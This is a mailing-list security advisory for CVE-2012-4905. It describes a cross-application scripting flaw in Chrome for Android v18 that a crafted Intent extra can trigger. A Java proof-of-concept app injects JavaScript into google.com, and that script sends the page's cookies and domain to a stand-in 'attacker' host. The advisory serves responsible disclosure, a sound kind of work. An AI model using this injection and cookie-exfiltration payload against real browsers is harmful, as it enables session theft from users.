[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Chrome for Android - UXSS via com.android.browser.application_id Intent extra



CVE Number:         CVE-2012-4905
Title:              Chrome for Android - UXSS via 
com.android.browser.application_id Intent extra
Affected Software:  Confirmed on Chrome for Android v18.0.1025123
Credit:             Takeshi Terada
Issue Status:       v18.0.1025308 was released which fixes this vulnerability

Overview:
  By sending a crafted Intent to Chrome for Android, malicious Android apps can
  inject javascript into arbitrary Web pages rendered in Chrome. Such kind of
  UXSS-like vulnerabilities is often called Cross-Application Scripting.

Details:
  When other Android apps send an Intent with javascript: URI to Chrome for
  Android (v18.0.1025123), Chrome opens a new tab and execute the JavaScript
  code in the context of the blank domain. Probably this is a countermeasure
  against UXSS attacks.

  However, this can be bypassed by an Intent with Extra data as below:

  intent.putExtra("com.android.browser.application_id", "com.android.chrome");

  With an Intent that contains such Extra data, Chrome loads javascript: URI
  (written in the Intent) in the current foreground tab, not in a blank tab.

  This enables malicious Android apps to execute arbitrary JavaScript code in
  arbitrary domains on Chrome. As a result, other apps are able to steal Cookies
  and so on.

Proof of Concept:
  package jp.mbsd.terada.attackchrome1;
  
  import android.app.Activity;
  import android.os.Bundle;
  import android.content.Intent;
  import android.net.Uri;
  
  public class Main extends Activity {
      @Override
      public void onCreate(Bundle savedInstanceState) {
          super.onCreate(savedInstanceState);
          setContentView(R.layout.main);
          doit();
      }
  
      // get intent to invoke the chrome app
      public Intent getIntentForChrome(String url) {
          Intent intent = new Intent("android.intent.action.VIEW");
          intent.setClassName("com.android.chrome", 
"com.google.android.apps.chrome.Main");
          intent.setData(Uri.parse(url));
          return intent;
      }
  
      public void doit() {
          try {
              // At first, force the chrome app to open a target Web page
              Intent intent1 = getIntentForChrome("http://www.google.com/1";);
              startActivity(intent1);
  
              // wait a few seconds
              Thread.sleep(3000);
  
              // JS code to inject into the target (www.google.com)
              String jsURL = "javascript:var 
e=encodeURIComponent,img=document.createElement('img');"
                  + 
"img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                  + "document.body.appendChild(img);";
  
              Intent intent2 = getIntentForChrome(jsURL);
  
              // Trick to prevent Chrome from opening the JS URL in a different 
tab
              intent2.putExtra("com.android.browser.application_id", 
"com.android.chrome");
              intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
  
              // Inject JS into the target Web page
              startActivity(intent2);
          }
          catch (Exception e) {}
      }
  }

Timeline:
  2012/07/07  Reported to Google security team.
  2012/09/12  Vender announced v18.0.1025308
  2013/01/07  Disclosure of this advisory

Recommendation:
  Upgrade to the latest version.

Reference:
  http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
  https://code.google.com/p/chromium/issues/detail?id=144813